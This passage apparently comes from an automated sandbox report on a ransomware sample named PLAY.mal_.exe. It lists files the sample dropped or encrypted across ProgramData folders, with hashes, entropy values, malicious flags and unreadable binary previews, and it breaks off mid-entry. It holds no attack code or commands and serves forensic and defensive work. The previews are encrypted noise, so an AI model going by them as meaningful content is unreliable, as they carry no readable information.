        SHA-512:C5B3C1A5A7A396FD14E11A76DA42000D33CF52839C8B1F66F55B8D5583DE80F82964D93E5D66F98854507DD62FC8AD3E5688EB8BE333A01A683ED8AE062E83FC
        Malicious:false
        Preview:N+.(a2..i..j...].J6.........Ke..j...}..m.%V.`...^A.M.v_.Y..v.........s....TQ....D.....r.l.....Fq..+.G...M...:]..O..........]F.i.I..9[`.~..z....:3.....ut&`H......7...T..U.|.!.I>............................ .R5..S..b,..i........f....S.<i...\..[.L.^^ ..?..W..?PI..2a.~...NA.8b.-Z.7.d..F......P...z.-.Ax'.....^.Y..-.q+.}......rO.......l..../).h.[.v{..A...D.-.,..QU.cg...@....?.}}.`........x...T+.`.&/+w+....0P...FX)..1-.R..E..b.33...."J.K8..a............me..!......>....^I..]1.H.k..X%..m....k.....&H..o..{..d*Gnf..g..K.?.Q[...}.dtP..i.$..NX..V..0.~@..NkGf..t..,.HG...m7..4.4.....a......+.q.z..........c...4GhA.........R1F.E .4..,.y.: U..TK.;.X...<V~....OP"Y#.h..|.0.D8...2.)t.-s)..X.H>.wr.W...8(F}'.c._...^...kj...s..2.[..eTI^.S...2..;...Um.Z+...<..XS.@.6.]..G...$.L#..p..#...}.s..$U..)..f...S(>b.u...Y....&_6m?V.S<K.W.|O..=.KGp..9.W2s..K.v....Z8..Z5U.S..1.YH..T.A$.k....|wB......u...MN.P..=.....1..MA.........;..^~...U9.."......l."W<.k9.[1>.A...n.

        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1560
        Entropy (8bit):7.866758026937131
        Encrypted:false
        SSDEEP:
        MD5:CCAEA2DF92EA357F568177BBACA30B57
        SHA1:0ADA776ED7FDB8EF750B82F74CDB07019C5DF49F
        SHA-256:72CC98B82ABDA23256E12B122FC6D8BC45506AA2D8A69BBD167EAC9F02430E23
        SHA-512:68C6681A6A95A11B2893591CC0C73C9A13C61531026E1D11356E94ABDFEF79BC7B2129C91B7679D444405F06D3535EA409A915BCFE037CD05E94A7EED78CCCD8
        Malicious:false
        Preview:\..B.(./s.(/.dD.U...B.s.Z.._.H..JB.b..?.F....'&.......k..1....:j..h_....80n..iD.j....u.x.-....z..s.<,.D.t...}wZO..|..bB.....V..%Pr......f .i.(..>.s.k.......Z.}.o...".'..i./o.l.9.. D....3.T....<.&.7..)..g.l...D.P\..+J.....H$....e?i.0..yT=....}.%..".g.7.^).l(.....7.X.......7.-6.|....a.......u.(.CQ.~...........67.8.E............. ?.....~.Em.....C..oy..R...xOZ.X.9....0..T..`..Y.o...SFw....&.......Ql$.M...E..C....t.D`R.o.....u7i.Cw.).]..6......l.8.D...3..1U.o.DC..,... ....T..U.|.!.I>.............................}6.7q.o.ee....r.k.w$B9.....t._.$j."N@7+d...h.h.........IOkD})...........$h!.....0.$...GL..Z.zG.=..#..fs.rJ.<....../.......I......&X.Z....CJ)SL..._.T"}.Q..).<...<...E.A..E./.{c.c...t=....b... ..f...+EZ..7L^.*..j...*...y.}X..<.....F0^...-.^.';.1....N.. .k".J ....q..a.....9"..?..x.'......s!dL....b..F...|.....F.|.2....[....l.].Z..ds..fb.H.....;.|....X4`.5.V~`GnP....Ij...gUo}o5J.... >.I.7f.:.".....n...F.=..F....i...4.oV3.J...e.6.wD..Z..A0

        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1240
        Entropy (8bit):7.837482266234121
        Encrypted:false
        SSDEEP:
        MD5:A0A9044BE316653614895E02769DD72A
        SHA1:8D049112249A4D71115A778F9279BC41C93DEDE0
        SHA-256:033E38B30C050046A539C0E9C3919757B8CD34E1BA7D8AD7FE639D4E22F4B195
        SHA-512:69EF8ED8E2035A1B5EF5056EE034F3D77BDDACAAFFF4F014F11423DB0AFD2BA299556695D95626E6253DC542EFBA666164C58A27DFC1CD75DA2D71E76F42F48A
        Malicious:false
        Preview:..=....j6..C...SQ.....q.W..W..e.b?#T...N..9...0.b9.......2 ..b.q;....k.`1..2...(..55=].."..Q.....T..6..N.%........?..X#V^`....s.#o.TLa....l.~..].J8.0.J......#....%]...T..U.|.!.I>..........................\.k0.w...+..4....}S/n.}...?...y`..Y..d....c..n._w.....^.....t..}^B..P..A...h9(..7e...vF..=..cJq..J5.!.....U...c...M.y.m.R_X.....cvJ....]....V$|&.I..6.).2...@.........2....-o-.u.z<.....b\.^..t....#l"4.......>GQ.."...|.B..0...huB...m#...&.D...J..u...........0Ml....o........O^.f.....S....>..eZ*..qL.@..-...... ..3..9.K0.........S....fv.8........q.....P...~D.........z.{.z.*..i........g..E.y-..].r..6uF.pm.m.....T.....!b$.u...l..s......?g..........X.....t.....v.Jj.N....##.h.-?Z...;p).k.12........j:S.]..,RZR.8<......}...}z:.E...)x~2.......c.. ..j...0)mJ.....fE.......sO-z.j.........>.8..D{^P..t2b.....g.....nc.\(.#.:..&.$.....i/....9|.1.y ..b..'..V.l5..-..e%.,....<`*...2...+}.cG3............+..~..Gj...oz..2+ .*...........d...6ok...-

        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:MPEG-4 LOAS
        Category:dropped
        Size (bytes):1416
        Entropy (8bit):7.846583114005943
        Encrypted:false
        SSDEEP:
        MD5:C80F782958523FC1162E83CBB6FEC0DD
        SHA1:C4F8B0C4FE726AC5C1F66430EC518F9FBAA98700
        SHA-256:65EB6E94A7F8ECC101F6B5A35EA4B9EE1EAED84D9341F6CFD5CFD3219D36FDC7
        SHA-512:4A3BBD67C5BD882BFB666D2597577AC950D9F4A28F72D37F8C765252862D8D576C9B7C5F497BE820D23DDB259E29235F1A5CFACCB78148B214A8324B08B88A04
        Malicious:false
        Preview:V.E.WP>."x..8R".....<5a.).%.,.j&......%.V.8+_....e....2j.....D.H.S!.;.....=Gi"b...".'.,/..%...K..*w!.G.3..--'.,c.8DfW.z..X...5.....\....[mY......@Gz........4.}.e.Lr .B.....s.........4..z......!...A..5.R..........^.U..........N..Y.!Z.=.gD...C.17+.]"?j.&.f!..p0..4..Zgr. U.Q..D............RI..".>.)..HI..f..]qKZ..3.W0..FM.z...du..T_J".......T..U.|.!.I>..........................5U.......N.....rJT.&.#....C...F.v%.g1l.......A]..../.i.Y....AMd..P.6.....{.F...s.....................QqcX6.Nr.....h.Z...j.+...!....3.jAy.gH....;.(2+........n...*..C.......6K..P.....|.._!..1.^.#F.B..:....0f..R.;..z..9.[..."..t#2@........rQ.OeZ.R0.f.T......e.`.h...J.......?.1tvZ.......q..m.(u..v..P.?..N<..L$.GR.^.4..R[.P...[$.$...9..R7.).5MO........f...4...d..!'...9v.......~.....X..7.C..\bc.._....2[....?...Uw./.!.I*....6a.!..&b.5.;..A.'.W*!..vE. ...\!.!.bqY..b..zH..KTb...ad.....s....r...N[.E_....g..Gha4F.'.?;8P....q..6..H....O..Xos.l.;c....i.&...d,.+.gi..YsQ

        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1816
        Entropy (8bit):7.879227356949742
        Encrypted:false
        SSDEEP:
        MD5:16B865E4723C467BB3C33081CCB7ADC1
        SHA1:94368C96BC09703969E4BD8DE041D11534D27CEF
        SHA-256:299DB2B943B9E5D132CF25B4DCFEAC214D40D9C29D2FBC964FCA63FD14D6D6A5
        SHA-512:B89CAC30765E2821A782ADC68D991A8426511847477935D2DFAF2D13BA64DC0D5FB90AD5C3BB7190C3817969DDEFB639BE2CE13DADF650E88E65C2049297D408
        Malicious:false
        Preview:..?..x.Yj.........w'+f.m..& .X...2..J.......".._..T.5..YRB.Yi...8Q.u*......"v..+2..}T....o....G4.....#..09.....W.5$-....b.....r.N.:.......6^L...P.....7r._.Z.>7..P..!a....l(.w.&y.#.f..Q.0...T.)(.{...E.u.E.....B^^......I~...R1I.ddn".z.A...E.@v{1...9$P.~...M#.@..5X.Q.^wu..vE....K.....I.T....<...9....Ydue$..........H._.N.#.>...k.r#e}.G.?.W.#.......FT$.r..%96V.`..7.p...` l..'l..5*...._....bV..=.p...8.......p...#.E..D.P.K..j.m...b._......zT.4......;\.xM.....79.....V...`.EA..o0-O...ta.~..w ..3u.uf..7-.. ^/...T........G..;.1..o....#.D ....XaL$..,BC".-_.R5..G....`..&05.T...^..i..Fa.d.[6H..r.........n.vA@. .Q...bbfi.<.....u..'g.AC2-R.......X......Ph[Y.= .....K1.....Y..F..^.x.NP.c..K..P..).X.pX.<x.L...K@2..S.....hQ}.T...T..U.|.!.I>...........................-?2..w....!.,.....m.E<..'.).../.9v?...t.m...J@v.*_Uq3...&..i.....r~X.D..:.D.H...!."..q..U.[.2..b.Hiu?..I.......PI=.+.....G..u.0.S.c)..=..kv.?.w..t..Z79.T.c.....Qs.W.......J../Z.q..H.~....p(p......G..

        C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1240
        Entropy (8bit):7.819328164318204
        Encrypted:false
        SSDEEP:
        MD5:6A9D096D5617859A458FCBD5ADF1D988
        SHA1:ED3F0F5ACDE61D81FCEDCA2ECADE22EDDF9BBF6C
        SHA-256:DEBAEF40E146FE3E61AFCD52FA8B216D236AD004EED52282EB1DBB1E409B5DE8
        SHA-512:41A5F7C226D670E53965FFB611234A753B1F17FD4223238C18130E06B7930641F8D4E4057BCB9ECE165C47F90883D9CA2CAA3EF254F632CE3A44D857BABB355E
        Malicious:false
        Preview:'dx...+{U........-G7.Q+%.d....X_..3..... .>o:.,.0..%v{..*H.....`<...].'.+...........#..K.....u........K..C.*w.a.c.j....7]...RQ...:M...q.....AH...E..VLbN.yH}{p.1.......T..U.|.!.I>...........................4.Rc..y#.y)e......^,.^.C...l..Gm.1.f5...*..'........s.7..Ypq.pA...h.f8..P.R...mhI...D..J.?..&,.+.......$.".....a.l...~...`.... ).a..F[.b.k.\...+7..+..u..c..u.v.<.....k..G.....iy........F5.R.f...<:}.AaX.F..._._..E.;:.Ef...b<....K.....EPG.....W.g...........'.. ...^.&0C.,.Fx..1..^.1......j.....j..Z._V8t._..O..6...A....y.=.C...A......J.&.N.n..K.o..5...w..u...*...[N.....=S...F..m...R...[-d.i...0.....+?....}....9uJ...d..`....z.....4d....o..6j....V`..V.,y..._..k.;....T...;.6...f.r..G...5....HB..Y)..0%.....Tjxi.^..h($.*/.]...O...h..v..AH.n5......._..x>...De...-xhm...F.D.F....y..+gd....2.. ...u.......n ....5....>N.Q%.......b!..{.IX...R.;..M....N.T...9..........a......:%.[....//?.F........../YR......E....X.....!.....)i4..H6..J.9.......5..p.

        C:\ProgramData\Oracle\Java\installcache\baseimagefam8

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):70998744
        Entropy (8bit):7.192133965564286
        Encrypted:false
        SSDEEP:
        MD5:99BF2E490B1356D8D5AB51C2048F51CF
        SHA1:D83FEAB02729D744F492DF1E76CB709AE796D22D
        SHA-256:199D3FBFF63C580D2D9F164BB343664E8A8FD7E4915E45F8294476B52D390AA7
        SHA-512:3B60A7DDD66F749EDFFEA6645540C1192003AF6863667091FC6BF3D23E0CF1B952A89BC6DCAA4F76522392BC1DF91B28F61CB77DB2AC10A4116CA2AE1482E9F4
        Malicious:false
        Preview:._EO.......i1...5.Er...p}..5S..jpz..r..P..#..4.....B...v?ZY[..J.#..,...e?$3...KM.E....{.L...5a.o|.h.o3g..]..)..(.sv.g......h.a.nd.....)...gV.9.....O.L.Yg2....d5c../..>..Fn..p..$..y.J.5..lW..K.........|.J+..2oT...9.V:.]..c.>O..*.$.X.H..GI.z...,.j..C.......I).a=.8".|..1:yesJ...t...V.".....:$....#"_..j...Qe.kD.l......+Ze.sc1%...@.#...S.n.7...Ic...+.....g.}.........n.....'..IF...qyctH...g ..... .s;.T..%@.5......./Z.I.....f.(..........\.X..\x..].9...AG7y"..x:8......U2....L..cE..o...........f1.2.*.6^..;.I_.B.sQy.<O.;....l Rm...1[....E........y+]..C{,.C...e.3^{...o.. ....d.d3.......p..!.?1...)....A..o.h.}..o....O.a..?......p..dc..~..:...6....[)........44#C<..Y.A..i....-m..&.u..)B....(.|..D.7.F*...i.>"{s...U.a_B..pQ.V..M...'.un.P.U{.)o\....U.0E...cSs=.{.-..*."?......96..&..-37....f.:.gf:>:..a..tg .{z.;M......./9M...!...> ..\*.L<.[.|Z6...&.?...C.h.......W...X=.o...[B..4'.(.N.O.k..#......9..4:........Y...<ZT..e.:.\......;x.d...[..k13l.

        C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\state.rsm

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1912
        Entropy (8bit):7.904634776120815
        Encrypted:false
        SSDEEP:
        MD5:033D0113D58676C879743931E39E553E
        SHA1:017B11A55B935C6A83E323B2BEF903DB443BF65F
        SHA-256:4FF7E748A8B8C09C02D6789F1996E5CD0BC56A9817A733468380501586F0C31B
        SHA-512:F80EA34210EBB46F4DF6B33FB18B95F86FDDF005CB1FA6B1E897F8070AD6565715B3FAE4A3D8E0D0CAB86F7A51991C96E317F8FDB0A0E490D64429D92A277616
        Malicious:false
        Preview:V[.Eh...W[.e[...d,bWU....K"....j.6D?0D.....q...#...Q......u..>..]8-.....g|.E....S.....c 0...r....3.B....K..\T.....6kn.nHj`..../..vL.1."...\....imY*5.#.....l..>.P.RqL...?...A.E.../?A.oo.x".f..Z.vsr..1i.7G.".+y.....n%.....*CT:.....lj..;..(...fk...NTW..%....;.li...n,...c..%&.G...V,x....X..=ur .......zc.{F{...?....7....=.C...,..$H.P....C.*......QWVW..N....n..$H.......[......T..bv..@..Y..v......4..g.$.$......i.a,9%...I...9..R...`x......u>.......c....lz^F/...j.9[X.......j.J."JGU..o0...7....+...4.sC..k'...GW.>Q...A<M.i.~e.....{....yN.(.bI./.~./...5.......8....3.R.%..O.=H. .V......_.6.O>..u.w...`..pl.K..1E..J=.~.#./.<w.Z...>.V.E.T.....(T.....p..Z3..<....P..yN.v.@.(s+.........V....C.!zn.....E5..1K.srI..^Lw.)...O..N....w...c.3%...ts..'L.&{.^.W83..gNK....@..y..Tw...g; ". |.E...R.... ...].`..HP.dY...T..U.|.!.I>..........................Z..*.9.=G..(..0~..L1..I.a...Hrpm....R[."p.d./U.t...k.Ax...3......\..t..Oa...%.\+F..5.7.}H..YH....Z.>3..y.%.f.

        C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5730392
        Entropy (8bit):7.998192276134512
        Encrypted:true
        SSDEEP:
        MD5:F93141E4711DEF0536A9525CAF2AE8A9
        SHA1:32E35043906EEC39E569EF17EF09E12A3D118E8E
        SHA-256:46BDD48359AA47CD01FEA86360B7DD65C2F23F187CA6F7DF3698092F1E828C6A
        SHA-512:58887D350B03FC4E8D51A65F629CF342A889CA1656418EEAD7E11783D0F3BF076804906C7EC117705C327DA3E188EAA10092F6F25AE37C708C136BD024F31FA3
        Malicious:true
        Preview:0s.*EQ.U'.. ..K>.r.c$....G-.V.f...".k..LF(.1..i.u...};A.=+.s...l.p<.W:...@c......uR.dO..|...$n..C.A.....4?....DG..H.P...Y...Jec.S..v.g.].3....K..^.....%.7b{..v`m...%.S.Fl.....}6".....t,a.p...7C.y.b...!,`.F.|...>\.O..")..bi.4b........X.I.......U}.;]s.i.9lk.......wX.P..'...(+.. .[SD.T..:.o.._.......t.d..k.....;6..N._.cm....<..cb.....iLUS..U.L..r..P.....l....`&.9..1F.........,_....R.c\.|.....m.k...j.q"D|..T....o.>.Um..-V.cuQ..l...<..:.....!.....Wp{.....i.@6.fQk...x......c.>t.w..`,dx....j.+.j%...d.. ^o(....w..*..O..2b.Rh`CH..i..G.)..^.ln.}|.(I.....h.Ii..U.......e..O:..1.*.fAj.....pa....,+I....\..lNa\...R.......d.4?X..6wT>W...C`.gV..m|J3..:.."qO.....2.b.q.S....#...z... ..b^......v.(...81e....K.,.v.{._..&l......q:....xw.j.uL...A] .c.cvv.....(.....\.....tz.&..@,?.'8.....M.....)\.J...u....;t3$.D.!,.......o;..,]af.B.\.......o.$.#.Xw.Q.~,U...7..(..U.$..Z..?..?"0.1h6p.J...Q.).@.. ......'..Kx.Y....$.Kk%.-X.i....!./.u..<..g.r....*!;~....Z...^J.t+O%

        C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\cab1.cab

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):998120
        Entropy (8bit):7.99978805820675
        Encrypted:true
        SSDEEP:
        MD5:6A6E9ED2B6280CFF9B790CA7C89FAC9F
        SHA1:D110CA5A10F4C6829CA1F345CB7D11766093929D
        SHA-256:BCC54FAA1C69F0AB10E5A32E49C02BBFC31D1B71EB80B93A9AC8E25918440C70
        SHA-512:453DC440786FE6292F200F57A8BB1485DA5597894D0C70F70881E0CB2614129F354E3B9B0C2B9AC1D59B1DAA8BAFEDDA1E7581AA5BF07E0A22BB1B8E61AE0BFE
        Malicious:true
        Preview:.w.N....H.znK...+=>.....^5.k..M.6.....q.=.#...~.L..7,..%..-...'.J./.:?p....E.yh......&p.........Z..(..G. .!.....,.Dr..,.@f......2r.0Y...4R5....-...+r.$..H.w.k.,..zW.-..J.x.....G.OY...y7P.3.7[.W...i.rD.L.f.a....0.3.........r..k.iz.w6...N5CHL...g...E.....<.....c...*...."?X...I..1..q1]....:S.#..@_.9!..4..,Y.O.r..s..D.$..@[s....p....2....".....l.....=..8..`0;......{Y.+YM......|..Vp%.J+........s\k.... ....m...o..kz...'..._-.@}.......K.Z...'g....s%..Z..f.~q..._..%..~|.Q,....g.......fy).....>#.._...^........x.7:..A..*..........B|.).>e.!~...xlw..!..ib..M.Y..PH"E...-...@!Tb....,.K(g.;..ok......#?.......,.h..v..Y.u..{xB...He......A...P....cv.iu...mR...,.DF.n..#Z.[.C..~..MBR.....5....<..T^j..B."'.."pH......j+k..5^.....k$yt....^o.f.Hf.^J.i."..Z...=..N.N.C..0......}......i..bi..tW..T..(...HC..<.JZ....>Z?.7;1.fT{Bq...I`...G.AD~c.1.cw.:..Y.4y.NdH..+(P.t.Q.#..DN.}. Y.l.Fs..y.T.R0..l).gEv{.?lP........_'/..be.0d1#'..,R`....Y.d#..X.Q7...o-..l..]..j.A

        C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\vcRuntimeMinimum_x86\cab1.cab

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:Dyalog APL version 167.40
        Category:dropped
        Size (bytes):1375656
        Entropy (8bit):7.99988789095555
        Encrypted:true
        SSDEEP:
        MD5:BD2A015513042A906CF555EE88FF1D3C
        SHA1:E48C2BDC7B03C50E14795ACB34098204B67D5B98
        SHA-256:8B51665B139F696D9C11E1EFE234F663DF450470DE3584E6DBEEF140F27E9D36
        SHA-512:472A14F2E9459F1EBD97AA23508BA63DCC3AFE75A0B908BBDEE1F9420F25944DB24A3B16D8C0D643A82B73EFDE0015810720F0D87BA624462D4F973E96F045AF
        Malicious:true
        Preview:...(.Q.].3...i.bU~.ZvPk.0.T.~.6.../Hgd&.(..U..]..9C.I..o2.t.D(._=.a.Nc...[i7....UK.....C....{.o.....XM"......=..R...+..q.).b..J.......(.h"....'..k......e.sn6...g......:a?6.w?&..).OE...(Z.m..m~.vE7...nL..iF ....$.A.n..&s.(.]zcFQ...Kzq..G...U.9..A...@+.%.......l."t.......71.W./[lQ....Si..y$........>.9#.&j.#.k.I.wnx......P.:.*...kK@!..|.m.<....P(...e.&..S ..m..D./(...f..y.<.Z..L...t..L....4s..s..j.O.. Y.C-....^C\....U...63..+....!..'..x..]......EdB?$..T.....i..1.c8..e[4.p>#r..G..OQ.....2...e....0.RL._t.?...*00...6....P.x.<7.I..I.c..(.xU..r.O.......zh..//f...$..R...O&...Q...{...nA..(.s.O.Zf...%.[.yu.....>..!../.u00N....a.......7!...gjB.O504P.D,.....%...#.J^vU...UP...z..%..j._%..8...M...8.|..Z....v....[...l...r@.....tzeZ.j....l)m..m..>,?o..Z/._..R..D.....U.m.e.E.UA...3...LM..&E.H.'F......XK. v.......1..$.2.!.*N]D.......x$.R.iZi...h>.tj/.Do...`.....-s....?._..P[2,*...ul[k...s/2.3.K.....X.P..x..^.j....j....5..,.\...~..T.YS.)-A...{.<...... ..C.

        C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\vcRuntimeAdditional_x86\cab1.cab

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5207768
        Entropy (8bit):7.9999677828535285
        Encrypted:true
        SSDEEP:
        MD5:2D154531D08C6534F1FCCC64F74AFCBD
        SHA1:2829B6ACB6F212C1E491EE841CDB457F97E48047
        SHA-256:FC0EC919BDA88BFAB71E28912522BA96C8EB94494B0EBD3BA42294E11A88C3A7
        SHA-512:BD0E9B647B1268F7D587482EFFE68A7BC0A25EBCAF6C6ECDC3A6DC9A5D2B91FA0EADC787B1B2ED933BC7D21D11F7C5377992AEA7F7AEADC79F555D706C6ECB08
        Malicious:true
        Preview:.....uY.3..y..i).`|...)[...Pz[p9?gp.t....7...-95.K..$..u..|S.D...C.x;...#..T....[.b.f.:t...T...9....._...vX..xE)V^.c.....U\N..);..Nl;....-..S.....JCP.....k...{~t6.wX.r...X.."6..N."...........8....H#.....i.M..i.\...B..nF4..i].J-.{.r.{........v.N.({a..s,...q.#...S;..>{#.(..Id.;m.......'.{..{....%.V....I.]...../^.....l..vr...O......,<..v...>....^.`...p,-..H.s.....X.Da..c?R.u...y0K..W....p..oU.2c>..t9.f@^...s.m..Q.J"z!...y'N..s60x..0+.&x.'.x.T2.<.......262..!T...{....gdr..n.0...7.}St...\.p......P...j..L.2r...o..4..y..=O..{d.......:.;.Kd.j. .....p.C..y...d{..! :.........Y....n....jrpS...*.S......F.<]....-..n._..O.t..D......L*k.{.g...>.2..K......W..M..3....arn.g...B.6.5+Z...D.....z.B>.%%.g......k.q.>k.5..e.~3.$..9.c.? ..{b..cyH.Bud..e{N...*.-.... .."....5.Ae...0.<o......y.../~.....*..*j.g...........I.S.y)j....-......B1.c.. _..J.+J..t..v.8..Z.pM..q..IS._lU..R|...~.s...R.d.&i.L|......;_$.e.>...x.hB4'^.0...2.....B.o...!..=.R...)..5.T.....o.]TI...

        C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\state.rsm

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1896
        Entropy (8bit):7.888880841660045
        Encrypted:false
        SSDEEP:
        MD5:B096DBD7865CC7A779DA795826181521
        SHA1:AB0545E501519B13A6E45F1BDAEDB2B48F0527B2
        SHA-256:38C0FA3958DE71ACF24ACF39753EC4DEEED765C9872639045D12DF2BEDB284A8
        SHA-512:3B73A2C5320B8E9A07A98CA02FCE367ABCBD82D22378EF4E5F402E58171257552549026FAC3DB1341BA3FE9D3BD2D309189DC12F1DDEA6DDCAF86B1282B13C50
        Malicious:false
        Preview:.K.t.*..CX*...].*.B.......@.y.. G....pP.C.%0.q$....1.....b.."h..1#ve...3s.<.....(.@.......%q.V.......<....1..}/._5.>....W.M..H...\(...%..'4.7l.d.9eD. He.Gg...'...w.M......RfW".+....CB.H.*...ez..'..l7.u..;.Dn...%Z.....8=#..KA..E2.#;.%N..............y..}.9_.7R....kCj<....!!g.P..n...O...{$.uL.....=.Q..(...K.'.q..Q+8h...^.....|.^..y..}.nx.XV....]......X..w.....e.......a.0...._.o.`jR"..#.3....'l...$!.c.sj...&J..7.>.....2K...H.B\.o...V..]Y.9T....Y...F.K.3c..O~.a.t..<cYo.$............%F....vBF..;.BH..,S.......c..,3..5. .....i0+_..8..Yp....(.m7.s.d.L".s.'4../...GY|V3.F..\..3..7.VN'...]..].^...8.. ...7..N..!...co..c. ....q>.Ez.&&.8\..qm5..*...'"...I..G..Ow.W..[P,...=....:.x4.=../F&Z.]...Z...m....e....j.a.Rx.F.K...^..# /..Hh..#N..a!%..j..X...O....w.....9........E...<....Z...rj.OY...T..U.|.!.I>...........................NV.e..YP.a..X..B..a.."..\..*XO.diP......@.#.D'..}...H9Y8..v.m.9....ft.D...|.....r.2..v..9.n./.B..kLG.>..`....u.. ...^.

        C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5801320
        Entropy (8bit):7.9984013871632325
        Encrypted:true
        SSDEEP:
        MD5:C2DAD1017BA52C0A6922BAD338B2ED97
        SHA1:718F72501713CD7E8B0157E1FC697258566AEF37
        SHA-256:D3623C96D298FC87FA617009467E365D71B66A9DF62046F2E5D5DAD0D6EC7AF8
        SHA-512:32F088BFDF2C8755A557675EEF5D79847620D3386C44150C91449C5159B929684C3E870B20CD3BC3C3F521592970A84C99BEE42A4BA669272CEA1376F91CA3A1
        Malicious:true
        Preview:@.W.@[...h.............EX...).&\..9~E.o%.4..7W.+{l..........w.J.X...|I.p...L.*..z....Y........M.Ug..2.S.a.......^./....W]..t.D..t..o..-:...sRI..ll.x.%1..V.......S.].Vxn.gb....m~.TH.s9..5.$b5......'.........L%.0..lH..Z,L&>.vv..O..e|qr....w.3?P@.t...^...MB...i.xO9..........r.R.f"_..W..l2.....4.[.|.s/......A...*.~...w...)..9..9...}F..W...n.*N..Q..X<.E)...r..s1..FD9.P...\.2...f.1+(j...I..J...=....?.S..yh.d.$.%F-=...........53o3=Tmk..iH2Gdk..=.J1j.....rq.*.......G...Q.\e....'..>.u.xB.av..P..._......w....xe...e......[...c...so...p\.$....S{.K...]/..~....\5>a..w.,..0.y|.3...Y.I.cl..Ky....w.-`..@i..I.3. ...j..~&4....}L..n(A...:.h.....S#BTp..0.K....X....<X.......Z28....b....6.l.p...0.....y.....7J....rJ.0..f.....W&..........*.C.......<EgV..Q..... .......x.k.b..\....u....&..x.z$......,.......!..h./..'............4i...M....@.g-,....e.1....!.=....{t.=.f.I..-I......a...^P..i.k..l.Q.....(.C]..9...E....Z.6@....^{Jd}H9............zYZ....+:..T......"..

        C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\state.rsm

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2248
        Entropy (8bit):7.92239326399871
        Encrypted:false
        SSDEEP:
        MD5:2EFE7957C04780D2A4D2D4D91B76EF5A
        SHA1:BE032296047C32F5816C698CBD893062C85934FC
        SHA-256:5A7B6864E9F045B9CE4C2D270483B3F49D2F33BE2F4C3D167D528E7F0852E592
        SHA-512:398BEC5B61C630E7E49E6C95CDB01CFA6C65A6F64F7EB29EDC10304ABD6AB76EB2F4DA8ACC37DFD24B436577FB1767EA10BD873A36909805B6ACF01185549669
        Malicious:false
        Preview:G<.....a5|"....V._T.....9..xq...2..t..\..p$....../..-.x.d...xZ......+E....C..=.i.p...^...W....X..W8.P'...<.+........~...r].......+./........Ro..-B...Z.9.2...*.3."e....{.....$.....F...!.*c0.v.h....N.i.!{D...:Q...r.`.P..f..u..X].k.P.|.r..~.v2@...K....w..{.Q...|F....z..='.l.\.8..V...dp.0s.9.K...7L..Z...*...].x..Q...{G.|....=...:..F..K[..4.q.-..N.0@.(..Q>o8.R.;7V.X~..QU6..6...h.Y....vqv.......P......WAM....W........o...b[..}UnU.J.?!#Zl."......v.Uk1.5..$.<v.<NI.7i.H...{......j*D....?.%.]..;C._...[Hd......Y../..e.3...c.k5'.(.b...C'.H.......kE@.<.?..[.6...R......j....d>.......y..-.#k...m)....e.z..5..=q...mj..S.N{Jn.U'..WA?...|........n..0..........w|....hv...S..P.A.^.*.{..M.E.R.....S{..0..).<.vo}...........T.L.h...V...H...L..[f.<......I.~=./......"%..d.._.....@...7..:.8.....+.po.....u...[. ....d+cN|N0..S..@....R.Q5s$..I.....f.....t.[/;.G'c....v..n8..:Kd......v<.&....ks.....e.W.j.........X.QL.?.?....i./$.)..d.K..0.*.+~.....v.F<..\..^..G.2....

        C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\cab1.cab

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5589352
        Entropy (8bit):7.998545828465086
        Encrypted:true
        SSDEEP:
        MD5:282500AB4DB2CF6CDA452D3312413E29
        SHA1:A15795EBC345D72425F094B54A2499CE0739F621
        SHA-256:532578D5F77CADC99AF60E8D7B55158E32FFD900888C8AA6CC690D5F77DFEFFC
